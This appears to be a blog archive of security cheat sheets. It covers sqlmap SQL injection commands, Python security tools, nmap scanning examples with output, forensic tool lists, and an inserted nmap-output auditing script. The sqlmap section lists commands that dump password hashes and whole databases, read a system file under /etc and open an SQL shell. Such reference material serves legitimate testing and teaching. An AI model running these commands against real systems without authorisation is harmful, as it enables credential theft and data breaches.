Archive for the ‘Cheat sheets’ Category

Some useful sqlmap commands for testing SQL injection vulnerabilities.

1) --is-dba: check whether the current user is a DBA
python sqlmap.py -u "url" --is-dba -v 1
2) --users: list the database management system users
python sqlmap.py -u "url" --users -v 0
3) --passwords: list database user passwords (hashes)
python sqlmap.py -u "url" --passwords -v 0
python sqlmap.py -u "url" --passwords -U sa -v 0
4) --privileges: view the user privileges
python sqlmap.py -u "url" --privileges -v 0
python sqlmap.py -u "url" --privileges -U postgres -v 0
5) --dbs: list the available databases
python sqlmap.py -u "url" --dbs -v 0
6) --tables: list the tables in a database
python sqlmap.py -u "url" --tables -D "information_schema"
-D: specifies the database name
7) --columns: list the column names of a table
python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1
-T: specifies the table name, -D: specifies the database name
8) --dump: dump the contents of the specified table
python sqlmap.py -u "url" --dump -T "users" -D "testdb"
-C: you can specify columns
Limit the dump to entries 2 to 4
python sqlmap.py -u "url" --dump -T "users" -D "testdb" --start 2 --stop 4 -v 0
9) --dump-all: dump the contents of all tables in all databases
python sqlmap.py -u "url" --dump-all -v 0
Dump only the user's own databases and tables (system databases excluded)
python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0
10) --file: read the contents of a file [load_file() function]
python sqlmap.py -u "url" --file /etc/password
11) Execute SQL
python sqlmap.py -u "url" --sql-shell
12) -p: specify the parameter to test
python sqlmap.py -u "url" -v 1 -p "id"
Multiple parameters can be given: -p "cat,id"
13) POST submission
python sqlmap.py -u "url" --method POST --data "id=1"
14) Cookie submission
python sqlmap.py -u "url" --cookie "id=1" -v 1
The cookie value can be captured with TamperData
15) Referer spoofing
python sqlmap.py -u "url" --refer "url" -v 3
16) Use a custom user-agent or user-agents.txt
python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"
17) Use multiple threads
python sqlmap.py -u "url" -v 1 --current-user --threads 3
18) Specify the DBMS, bypassing sqlmap's automatic detection
python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"
19) Specify the operating system, bypassing sqlmap's automatic detection
python sqlmap.py -u "url" -v 2 --os "Windows"
20) --prefix and --postfix: custom payload
python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"
21) UNION injection test
python sqlmap.py -u "url" --union-test -v 1
22) UNION test with the ORDER BY technique
python sqlmap.py -u "url" --union-test --union-tech orderby -v 1
23) python sqlmap.py -u "url" -v 1 --union-use --banner
24) python sqlmap.py -u "url" -v 5 --union-use --current-user
25) python sqlmap.py -u "url" -v 1 --union-use --dbs


If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest trying out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them.
Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries easily usable from Python programs.
Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side.


  • Scapy, Scapy3k: send, sniff, dissect and forge network packets. Usable interactively or as a library
  • pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
  • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
  • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
  • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
  • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
  • Dirtbags py-pcap: read pcap files without libpcap
  • flowgrep: grep through packet payloads using regular expressions
  • Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
  • SubBrute, fast subdomain enumeration tool
  • Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly
  • Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)
  • Spoodle: A mass subdomain + poodle vulnerability scanner
  • SMBMap: enumerate Samba share drives across an entire domain

Debugging and reverse engineering

  • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
  • Immunity Debugger: scriptable GUI and command line debugger
  • PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
  • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
  • PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
  • pefile: read and work with Portable Executable (aka PE) files
  • pydasm: Python interface to the libdasm x86 disassembling library
  • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
  • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
  • diStorm: disassembler library for AMD64, licensed under the BSD license
  • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
  • vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it
  • Androguard: reverse engineering and analysis of Android applications
  • Capstone: lightweight multi-platform, multi-architecture disassembly framework with Python bindings
  • Keystone: lightweight multi-platform, multi-architecture assembler framework with Python bindings
  • PyBFD: Python interface to the GNU Binary File Descriptor (BFD) library
  • CHIPSEC: framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components.


  • afl-python: enables American fuzzy lop fork server and instrumentation for pure-Python code
  • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
  • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing (v2 was written in Python)
  • antiparser: fuzz testing and fault injection API
  • TAOF, (The Art of Fuzzing) including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
  • untidy: general purpose XML fuzzer
  • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
  • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
  • Fuzzbox: multi-codec media fuzzer
  • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
  • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
  • WSBang: perform automated security testing of SOAP based web services
  • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
  • (feliam): simple fuzzer by Felipe Andres Manzano
  • Fusil: Python library used to write fuzzing programs


  • Requests: elegant and simple HTTP library, built for human beings
  • HTTPie: human-friendly cURL-like command line HTTP client
  • ProxMon: processes proxy logs and reports discovered issues
  • WSMap: find web service endpoints and discovery files
  • Twill: browse the Web from a command-line interface. Supports automated Web testing
  • webkit web client written in Python
  • Windmill: web testing tool designed to let you painlessly automate and debug your web application
  • FunkLoad: functional and load web tester
  • spynner: Programmatic web browsing module for Python with Javascript/AJAX support
  • python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions
  • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
  • pathod / pathoc: pathological daemon/client for tormenting HTTP clients and servers


  • Volatility: extract digital artifacts from volatile memory (RAM) samples
  • Rekall: memory analysis framework developed by Google
  • LibForensics: library for developing digital forensics applications
  • TrIDLib, identify file types from their binary signatures. Now includes Python binding
  • aft: Android forensic toolkit

Malware analysis

  • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
  • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
  • pyClamAV: add virus detection capabilities to your Python software
  • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
  • yara-python: identify and classify malware samples
  • phoneyc: pure Python honeyclient implementation
  • CapTipper: analyse, explore and revive HTTP malicious traffic from PCAP file


  • peepdf: Python tool to analyse and explore PDF files to find out if they can be harmful
  • Didier Stevens’ PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser, make-pdf and mPDF)
  • Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified.
  • Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
  • pyPDF2: pure Python PDF toolkit: extract info, split, merge, crop, encrypt, decrypt…
  • PDFMiner: extract text from PDF files
  • python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support


  • InlineEgg: toolbox of classes for writing small assembly programs in Python
  • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
  • RevHosts: enumerate virtual hosts for a given IP address
  • simplejson: JSON encoder/decoder, e.g. to use Google’s AJAX API
  • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • Hachoir: view and edit a binary stream field by field
  • py-mangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • execute Powershell commands quickly and easily via WMI
  • Pentestly: Python and Powershell internal penetration testing framework

Other useful libraries and tools

  • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
  • Beautiful Soup: HTML parser optimized for screen-scraping
  • matplotlib: make 2D plots of arrays
  • Mayavi: 3D scientific data visualization and plotting
  • RTGraph3D: create dynamic graphs in 3D
  • Twisted: event-driven networking engine
  • Suds: lightweight SOAP client for consuming Web Services
  • M2Crypto: most complete OpenSSL wrapper
  • NetworkX: graph library (edges, nodes)
  • Pandas: library providing high-performance, easy-to-use data structures and data analysis tools
  • pyparsing: general parsing module
  • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
  • Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
  • Pexpect: control and automate other programs, similar to Don Libes’ `Expect` system
  • Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
  • PyQt and PySide: Python bindings for the Qt application framework and GUI library




Nmap is a powerful network scanner used to identify systems and services. nmap was originally developed with network security in mind; it is a tool that was designed to find vulnerabilities within a network. nmap is more than just a simple port scanner though: you can use nmap to find specific versions of services, certain OS types, or even find that pesky printer someone put on your network without telling you.

nmap can be used for good and for evil. Today we will cover some common situations where nmap makes life easier for sysadmins, which is generally good. Even if some Sysadmins are evil…

Discover IPs in a subnet (no root)

 $ nmap -sP
 Starting Nmap 7.30 ( ) at 2016-10-12 21:12 GMT
 Nmap scan report for
 Host is up (0.0013s latency).
 Nmap scan report for
 Host is up (0.0032s latency).
 Nmap scan report for
 Host is up (0.0011s latency).

This is one of the simplest uses of nmap. This command is commonly referred to as a “ping scan”, and tells nmap to send an ICMP echo request, a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request to all hosts in the specified subnet. nmap will simply return a list of IPs that responded. Unlike many nmap commands, this particular one does not require root privileges; however, when executed by root, nmap will also by default send ARP requests to the subnet.

Scan for open ports (no root)

 $ nmap
 Starting Nmap 7.30 ( ) at 2016-10-12 21:20 GMT
 Nmap scan report for
 Host is up (0.0043s latency).
 Not shown: 998 closed ports
 PORT STATE SERVICE
 80/tcp open http
 443/tcp open https

This scan is the default scan for nmap and can take some time to generate. With this scan nmap will attempt a TCP SYN connection to 1000 of the most common ports as well as an ICMP echo request to determine if a host is up. nmap will also perform a DNS reverse lookup on the identified IPs, as this can sometimes be useful information.

Identify the Operating System of a host (requires root)

 # nmap -O
 Starting Nmap 7.30 ( ) at 2016-10-12 21:35 GMT
 Nmap scan report for
 Host is up (0.00032s latency).
 Not shown: 996 closed ports
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 MAC Address: 00:00:00:00:00:00 (Unknown)
 Device type: general purpose
 Running: Apple Mac OS X 10.5.X
 OS details: Apple Mac OS X 10.5 - 10.6 (Leopard - Snow Leopard) (Darwin 9.0.0b5 - 10.0.0)
 Network Distance: 1 hop

With the -O option nmap will try to guess the target’s operating system. This is accomplished by utilizing information that nmap is already getting through the TCP SYN port scan. This is usually a best guess but can actually be fairly accurate. The operating system scan, however, does require root privileges.

Identify Hostnames (no root)

 $ nmap -sL
 Starting Nmap 7.30 ( ) at 2016-10-12 21:35 GMT
 Nmap scan report for
 Nmap scan report for router.local (
 Nmap scan report for fake.local (
 Nmap scan report for another.fake.local (

This is one of the most subtle commands of nmap: the -sL flag tells nmap to do a simple DNS query for the specified IP. This allows you to find hostnames for all of the IPs in a subnet without having to send a packet to the individual hosts themselves.

Hostname information can tell you a lot more about a network than you would think, for instance if you labeled your Active Directory Servers with you shouldn’t be surprised if someone guesses its use.

TCP Syn and UDP Scan (requires root)

 # nmap -sS -sU -PN
 Starting Nmap 7.30 ( ) at 2016-10-12 21:12 GMT
 Nmap scan report for
 Host is up (0.00029s latency).
 Not shown: 1494 closed ports, 496 filtered ports
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 88/udp open|filtered kerberos-sec
 123/udp open ntp
 137/udp open netbios-ns
 138/udp open|filtered netbios-dgm
 631/udp open|filtered ipp
 5353/udp open zeroconf

The TCP SYN and UDP scan will take a while to generate but is fairly unobtrusive and stealthy. This command will check about 2000 common TCP and UDP ports to see if they are responding. The -PN flag tells nmap to skip the ping scan and assume the host is up. This can be useful when there is a firewall that might be preventing ICMP replies.

TCP SYN and UDP scan for all ports (requires root)

 # nmap -sS -sU -PN -p 1-65535
 Starting Nmap 7.30 ( ) at 2016-10-12 21:36 GMT
 Nmap scan report for
 Host is up (0.00021s latency).
 Not shown: 131051 closed ports
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 17500/tcp open unknown
 88/udp open|filtered kerberos-sec
 123/udp open ntp
 137/udp open netbios-ns
 138/udp open|filtered netbios-dgm
 631/udp open|filtered ipp
 5353/udp open zeroconf
 17500/udp open|filtered unknown
 51657/udp open|filtered unknown
 54658/udp open|filtered unknown
 57798/udp open|filtered unknown
 58488/udp open|filtered unknown
 60027/udp open|filtered unknown

This command is the same as above; however, by specifying the full port range from 1 to 65535, nmap will scan to see if the host is listening on all available ports. You can use the port range specification on any scan that performs a port scan.

TCP Connect Scan (no root)

 $ nmap -sT
 Starting Nmap 7.30 ( ) at 2016-10-12 21:40 GMT
 Nmap scan report for
 Host is up (0.0015s latency).
 Not shown: 964 closed ports, 32 filtered ports
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp

This command is similar to the TCP SYN scan; however, rather than sending a SYN packet and reviewing the headers, it will ask the OS to establish a TCP connection to the 1000 common ports.

Aggressively Scan Hosts (no root)

 $ nmap -T4 -A
 Nmap scan report for
 Host is up (0.00060s latency).
 Not shown: 996 closed ports
 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (protocol 2.0)
 | ssh-hostkey: 1024 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:6c (DSA)
 |_2048 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:6c (RSA)
 80/tcp open http nginx 1.1.19
 |_http-title: 403 Forbidden
 |_http-methods: No Allow or Public header in OPTIONS response (status code 405)
 111/tcp open rpcbind
 | rpcinfo:
 | program version port/proto service
 | 100000 2,3,4 111/tcp rpcbind
 | 100000 2,3,4 111/udp rpcbind
 | 100003 2,3,4 2049/tcp nfs
 | 100003 2,3,4 2049/udp nfs
 | 100005 1,2,3 46448/tcp mountd
 | 100005 1,2,3 52408/udp mountd
 | 100021 1,3,4 35394/udp nlockmgr
 | 100021 1,3,4 57150/tcp nlockmgr
 | 100024 1 49363/tcp status
 | 100024 1 51515/udp status
 | 100227 2,3 2049/tcp nfs_acl
 |_ 100227 2,3 2049/udp nfs_acl
 2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
 Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Unlike some of the earlier commands, this command is very aggressive and very obtrusive. The -A simply tells nmap to perform OS checking and version checking. The -T4 is the speed template; these templates tell nmap how quickly to perform the scan. The speed template ranges from 0 for slow and stealthy to 5 for fast and obvious.

Fast Scan (no root)

 $ nmap -T4 -F
 Starting Nmap 7.30 ( ) at 2016-10-12 21:48 GMT
 Nmap scan report for
 Host is up (0.00047s latency).
 Not shown: 96 closed ports
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp

This scan limits the scan to the most common 100 ports. If you simply want to know some potential hosts with ports open that shouldn’t be, this is a quick and dirty command to use.
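As an added example (not part of the original article): a small Python parser for the port tables nmap prints in the scans above, which compares each host's open ports with an allowlist so that ports that shouldn't be open stand out. The sample output, the 192.0.2.x addresses, the baseline and the names `parse_nmap_output` and `audit` are constructed for illustration.

```python
import re
from collections import namedtuple

# Constructed sample in nmap's normal output format; the addresses are
# documentation-range placeholders, not hosts from the article.
SAMPLE_OUTPUT = """\
Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-12 21:12 GMT
Nmap scan report for 192.0.2.10
Host is up (0.00029s latency).
Not shown: 1494 closed ports, 496 filtered ports
PORT     STATE         SERVICE
88/tcp   open          kerberos-sec
445/tcp  open          microsoft-ds
631/tcp  open          ipp
123/udp  open          ntp
138/udp  open|filtered netbios-dgm
Nmap scan report for printer.example (192.0.2.20)
Host is up (0.0011s latency).
PORT     STATE    SERVICE
80/tcp   open     http
9100/tcp open     jetdirect
23/tcp   filtered telnet
"""

# Constructed allowlist: the services each host is expected to expose.
BASELINE = {
    "192.0.2.10": {"88/tcp", "445/tcp", "123/udp"},
    "192.0.2.20": {"9100/tcp"},
}

Port = namedtuple("Port", "number proto state service")

# "Nmap scan report for name (addr)" or "Nmap scan report for addr"
HOST_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \((?P<addr>[^)]+)\)|(?P<only>\S+))$"
)
# "631/tcp open ipp CUPS 1.4": anything after the service name is ignored.
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp|sctp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
)


def parse_nmap_output(text):
    """Return {host: [Port, ...]} from nmap's normal (terminal or -oN) output."""
    hosts = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        match = HOST_RE.match(line)
        if match:
            # Key on the address when nmap printed "name (addr)".
            current = match.group("addr") or match.group("only")
            hosts.setdefault(current, [])
            continue
        match = PORT_RE.match(line)
        # NSE script lines start with "|" and never match PORT_RE.
        if match and current is not None:
            hosts[current].append(
                Port(int(match.group("port")), match.group("proto"),
                     match.group("state"), match.group("service"))
            )
    return hosts


def audit(hosts, baseline):
    """Compare parsed ports with an allowlist {host: {"port/proto", ...}}.

    Returns sorted (host, "port/proto", service, verdict) tuples. The verdict is
    "unexpected" for a confirmed open port missing from the baseline and
    "unconfirmed" for open|filtered (no reply, common for UDP), which calls for
    a follow-up check rather than an alert. Closed and filtered ports are skipped.
    """
    findings = []
    for host, ports in hosts.items():
        allowed = baseline.get(host, set())
        for port in ports:
            key = f"{port.number}/{port.proto}"
            if key in allowed or port.state not in ("open", "open|filtered"):
                continue
            verdict = "unexpected" if port.state == "open" else "unconfirmed"
            findings.append((host, key, port.service, verdict))
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit(parse_nmap_output(SAMPLE_OUTPUT), BASELINE):
        print("%s %s (%s): %s" % finding)
```

A host missing from the baseline is treated as having no approved ports, so every open port on it is reported.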


 $ nmap -T4 -A -v
 Starting Nmap 7.30 ( ) at 2016-10-12 21:50 GMT
 NSE: Loaded 93 scripts for scanning.
 NSE: Script Pre-scanning.
 Initiating Ping Scan at 21:50
 Scanning [2 ports]
 Completed Ping Scan at 21:50, 0.00s elapsed (1 total hosts)
 Initiating Parallel DNS resolution of 1 host. at 21:50
 Completed Parallel DNS resolution of 1 host. at 21:50, 0.01s elapsed
 Initiating Connect Scan at 21:50
 Scanning [1000 ports]
 Discovered open port 139/tcp on
 Discovered open port 445/tcp on
 Discovered open port 88/tcp on
 Discovered open port 631/tcp on
 Completed Connect Scan at 21:50, 5.22s elapsed (1000 total ports)
 Initiating Service scan at 21:50
 Scanning 4 services on
 Completed Service scan at 21:51, 11.00s elapsed (4 services on 1 host)
 NSE: Script scanning
 Initiating NSE at 21:51
 Completed NSE at 21:51, 12.11s elapsed
 Nmap scan report for
 Host is up (0.00026s latency).
 Not shown: 996 closed ports
 88/tcp open kerberos-sec Mac OS X kerberos-sec
 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 631/tcp open ipp CUPS 1.4
 | http-methods: GET HEAD OPTIONS POST PUT
 | Potentially risky methods: PUT
 | http-robots.txt: 1 disallowed entry
 Service Info: OS: Mac OS X; CPE: cpe:/o:apple:mac_os_x

By adding verbose to a majority of the commands above you get a better insight into what nmap is doing; for some scans verbosity will provide additional details that the report does not provide.
While these are 10 very useful nmap commands I am sure there are some more handy nmap examples out there. If you have one to add to this list feel free to drop it into a comment.

Performing a nMap Scan


Here is some help for you guys and gals that are looking for some forensic tools, they can also be good fun to mess around with.

1. Disk tools and data capture

Arsenal Image Mounter :
Mounts disk images as complete disks in Windows, giving access to Volume Shadow Copies, etc.
DumpIt :
Generates physical memory dump of Windows machines, 32-bit and 64-bit. Can run from a USB flash drive.
EnCase :
Create EnCase evidence files and EnCase logical evidence files
Encrypted Disk Detector :
Checks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes
EWF MetaEditor :
Edit EWF (E01) meta data, remove passwords (Encase v6 and earlier)
FAT32 Format :
Enables large capacity disks to be formatted as FAT32
Forensics Acquisition of Websites :
Browser designed to forensically capture web pages
FTK Imager :
Imaging tool, disk viewer and image mounter
Guymager :
Multi-threaded GUI imager running under Linux
Live RAM Capturer :
Extracts RAM dump including that protected by an anti-debugging or anti-dumping system. 32 and 64 bit builds
NetworkMiner :
Network analysis tool. Detects OS, hostname and open ports of network hosts through packet sniffing/PCAP parsing
Nmap :
Utility for network discovery and security auditing
Magnet RAM :
Captures physical memory of a suspect’s computer. Windows XP to Windows 10, and 2003, 2008, 2012. 32 & 64 bit
OSFClone :
Boot utility for CD/DVD or USB flash drives to create dd or AFF images/clones.
OSFMount :
Mounts a wide range of disk images. Also allows creation of RAM disks
Wireshark :
Network protocol capture and analysis
Disk2vhd :
Creates Virtual Hard Disks versions of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V VMs

2. Email analysis

EDB Viewer :
Open and view (not export) Outlook EDB files without an Exchange server
Mail Viewer :
Viewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files
MBOX Viewer :
View MBOX emails and attachments
OST Viewer  :
Open and view (not export) Outlook OST files without connecting to an Exchange server
PST Viewer  :
Open and view (not export) Outlook PST files without needing Outlook
3. General tools

Agent Ransack :
Search multiple files using Boolean operators and Perl Regex
Computer Forensic Reference Data Sets :
Collated forensic images for training, practice and validation
EvidenceMover :
Copies data between locations, with file comparison, verification, logging
FastCopy :
Self labelled ‘fastest’ copy/delete Windows software. Can verify with SHA-1, etc.
File Signatures :
Table of file signatures
HexBrowser :
Identifies over 1000 file types by examining their signatures
HashMyFiles :
Calculate MD5 and SHA1 hashes
MobaLiveCD :
Run Linux live CDs from their ISO image without having to boot to them
Mouse Jiggler :
Automatically moves mouse pointer stopping screen saver, hibernation etc.
Notepad ++ :
Advanced Notepad replacement
Hash sets of ‘known’ (ignorable) files
Quick Hash :
A Linux & Windows GUI for individual and recursive SHA1 hashing of files
USB Write Blocker :
Enables software write-blocking of USB ports
Volix :
Application that simplifies the use of the Volatility Framework
Windows Forensic Environment :
Guide by Brett Shavers to creating and working with a Windows boot CD
4. File and data analysis

Advanced Prefetch Analyser :
Reads Windows XP,Vista and Windows 7 prefetch files
analyzeMFT :
Parses the MFT from an NTFS file system allowing results to be analysed with other tools
bstrings :
Find strings in binary data, including regular expression searching.
CapAnalysis :
PCAP viewer
Crowd Response :
Windows console application to aid gathering of system information for incident response and security engagements.
Crowd Inspect :
Details network processes, listing binaries associated with each process. Queries VirusTotal, other malware repositories & reputation services to produce “at-a-glance” state of the system
DCode :
Converts various data types to date/time values
Defraser :
Detects full and partial multimedia files in unallocated space
eCryptfs Parser :
Recursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc.
Encryption Analyzer :
Scans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file
ExifTool :
Read, write and edit Exif data in a large number of file types
File Identifier :
Drag and drop web-browser JavaScript tool for identification of over 2000 file types
Forensic Image Viewer :
View various picture formats, image enhancer, extraction of embedded Exif, GPS data
Ghiro :
In-depth analysis of image (picture) files
Highlighter :
Examine log files using text, graphic or histogram views
Link Parser :
Recursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files
LiveContactsView :
View and export Windows Live Messenger contact details
PECmd :
Prefetch Explorer
PlatformAuditProbe :
Command Line Windows forensic/incident response tool that collects many artefacts.
RSA Netwitness Investigator :
Network packet capture and analysis
Memoryze :
Acquire and/or analyse RAM images, including the page file on live systems
MetaExtractor :
Recursively parses folders to extract meta data from MS Office, OpenOffice and PDF files
MFTview :
Displays and decodes contents of an extracted MFT file
PictureBox :
Lists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format
PsTools :
Suite of command-line Windows utilities
Shadow Explorer :
Browse and extract files from shadow copies
SQLite Manager :
Firefox add-on enabling viewing of any SQLite
Strings :
Command-line tool for text searches
Structured Storage Viewer :
View and manage MS OLE Structured Storage based files
Switch-a-Roo :
Text replacement/converter/decoder for when dealing with URL encoding, etc
Windows File Analyzer :
Analyse thumbs.db, Prefetch, INFO2 and .lnk files
Xplico :
Network forensics analysis tool
5. Mac OS tools

Audit :
Audit Preference Pane and Log Reader for OS X
ChainBreaker :
Parses keychain structure, extracting user’s confidential information such as application account/password, encrypted volume password (e.g. filevault), etc
Disk Arbitrator :
Blocks the mounting of file systems, complementing a write blocker in disabling disk arbitration
Epoch Converter :
Converts epoch times to local time and UTC
FTK Imager CLI for Mac OS :
Command line Mac OS version of AccessData’s FTK Imager
IORegInfo :
Lists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected
PMAP Info :
Displays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors
Volafox :
Memory forensic toolkit for Mac OS X
6. Mobile devices

iPBA2 :
Explore iOS backups
iPhone Analyzer :
Explore the internal file structure of iPad, iPod and iPhones
ivMeta :
Extracts phone model and software version and created date and GPS data from iPhone videos.
Last SIM Details :
Parses physical flash dumps and Nokia PM records to find details of previously inserted SIM cards.
Rubus :
Deconstructs Blackberry .ipd backup files
Obtain SMS Messages, call logs and contacts from Android devices
7. Data analysis suites

Autopsy :
Graphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below)
Backtrack :
Penetration testing and security audit with forensic boot capability
Caine :
Linux based live CD, featuring a number of analysis tools
Deft :
Linux based live CD, featuring a number of analysis tools
Digital Forensics Framework :
Analyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items
Forensic Scanner :
Automates ‘repetitive tasks of data collection’.
Paladin :
Ubuntu based live boot CD for imaging and analysis
VMware Appliance pre-configured with multiple tools allowing digital forensic examinations
The Sleuth Kit :
Collection of UNIX-based command line file and volume system forensic analysis tools
Volatility Framework :
Collection of tools for the extraction of artefacts from RAM

8. Internet analysis
MozillaHistoryView :
Reads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web pages
MyLastSearch :
Extracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace)
PasswordFox :
Extracts the user names and passwords stored by Mozilla Firefox Web browser
OperaCacheView :
Reads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache
OperaPassView :
Decrypts the content of the Opera Web browser password file, wand.dat
Web Historian :
Reviews list of URLs stored in the history files of the most commonly used browsers
Web Page Saver :
Takes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages

9. Registry analysis

AppCompatCache Parser :
Dumps list of shimcache entries showing which executables were run and their modification dates.
ForensicUserInfo :
Extracts user information from the SAM, SOFTWARE and SYSTEM hives files and decrypts the LM/NT hashes from the SAM file
Process Monitor :
Examine Windows processes and registry threads in real time
RECmd :
Command line access to offline Registry hives. Supports simple & regular expression searches as well as searching by last write timestamp.
Registry Decoder :
For the acquisition, analysis, and reporting of registry contents
Registry Explorer :
Offline Registry viewer. Provides deleted artefact recovery, value slack support, and robust searching.
RegRipper :
Registry data extraction and correlation tool
Regshot :
Takes snapshots of the registry allowing comparisons e.g., show registry changes after installing software
ShellBags Explorer  :
Presents visual representation of what a user’s directory structure looked like. Additionally exposes various timestamps (e.g., first explored, last explored for a given folder).
USB Device Forensics :
Details previously attached USB devices on exported registry hives
USB Historian :
Displays 20+ attributes relating to USB device use on Windows systems
USBDeview :
Details previously attached USB devices
User Assist Analysis :
Extracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys
UserAssist :
Displays list of programs run, with run count and last run date and time
Windows Registry Recovery :
Extracts configuration settings and other information from the Registry

10. Application analysis

Dropbox Decryptor :
Decrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox
Google Maps Tile Investigator :
Takes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context
KaZAlyser :
Extracts various data from the KaZaA application
LiveContactsView :
View and export Windows Live Messenger contact details
SkypeLogView :
View Skype calls and chats

tv - programer


I know personally, I am not one of those people that can remember every detail of every language and never look anything up. It’s nice to have a cheat sheet with a quick summary of some of the most commonly used procedures, tags, tools, syntax, etc., saving time that would have been used to look it up on Google or dig through documentation either online or in printed text. The following is a list of links to several different cheat sheets on a wide variety of tasks and tools.

You can print them out and hang them on your wall (my personal choice) or simply bookmark them for easy access down the road. If you have any additional suggestions or see something I have missed, let me know…


Command Line

Windows Command Line Reference

BASH Command Line Reference

DOS Commands



MySQL Cheat Sheet

